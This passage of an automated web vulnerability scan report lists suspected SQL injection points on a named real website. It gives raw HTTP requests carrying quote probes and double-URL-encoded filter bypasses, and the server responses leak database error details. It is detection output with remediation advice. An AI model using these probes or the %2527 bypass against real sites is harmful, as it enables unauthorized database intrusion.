ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:42:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /index.php?option=com_content&eid=Array&Itemid=75&itemid=70&format=html&id=106:google-analytics-health-check&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0%2527; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:57:38 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_content&eid=Array&Itemid=75&itemid=70&format=html&id=106:google-analytics-health-check&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0%2527%2527; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:57:44 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The commenttype parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the commenttype parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the commenttype request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /index.php?option=com_content&eid=Array&Itemid=75&itemid=70&format=html&id=106:google-analytics-health-check&view=article&layout=default&commenttype=20%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:44:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_content&eid=Array&Itemid=75&itemid=70&format=html&id=106:google-analytics-health-check&view=article&layout=default&commenttype=20%2527%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:45:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=95&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTk1Om1vcmUtZGltZW5zaW9ucy1zaXRlLXNlYXJjaC1zb3VyY2UtbWVkaXVtJnZpZXc9YXJ0aWNsZSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:41:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=95&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTk1Om1vcmUtZGltZW5zaW9ucy1zaXRlLXNlYXJjaC1zb3VyY2UtbWVkaXVtJnZpZXc9YXJ0aWNsZSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:41:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=a77f75152f2e9e356b016e9fc90bebd7; path=/ Connection: close Content-Type: text/html
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The eid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the eid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /index.php?option=com_content&eid=Array'&Itemid=75&itemid=70&format=html&id=106:google-analytics-health-check&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:35:49 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_content&eid=Array''&Itemid=75&itemid=70&format=html&id=106:google-analytics-health-check&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:35:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:35:54 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:35:55 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The etid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the etid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=109'&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwOTpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXNhbi1qb3NlLTIwMTAmdmlldz1hcnRpY2xlJmxheW91dD1kZWZhdWx0JmNvbW1lbnR0eXBlPTIw&format=html&titleheader=[ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=109&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwOTpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXNhbi1qb3NlLTIwMTAmdmlldz1hcnRpY2xlJmxheW91dD1kZWZhdWx0JmNvbW1lbnR0eXBlPTIw Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:39:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=109''&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwOTpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXNhbi1qb3NlLTIwMTAmdmlldz1hcnRpY2xlJmxheW91dD1kZWZhdWx0JmNvbW1lbnR0eXBlPTIw&format=html&titleheader=[ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=109&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwOTpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXNhbi1qb3NlLTIwMTAmdmlldz1hcnRpY2xlJmxheW91dD1kZWZhdWx0JmNvbW1lbnR0eXBlPTIw Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:39:44 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:39:45 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:39:45 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The file_17 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the file_17 parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /index.php?option=com_content&eid=Array&Itemid=66&itemid=70&format=html&id=90:analytics-toolbar&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/90-analytics-toolbar.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:44:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_content&eid=Array&Itemid=66&itemid=70&format=html&id=90:analytics-toolbar&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/90-analytics-toolbar.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:44:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:51:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
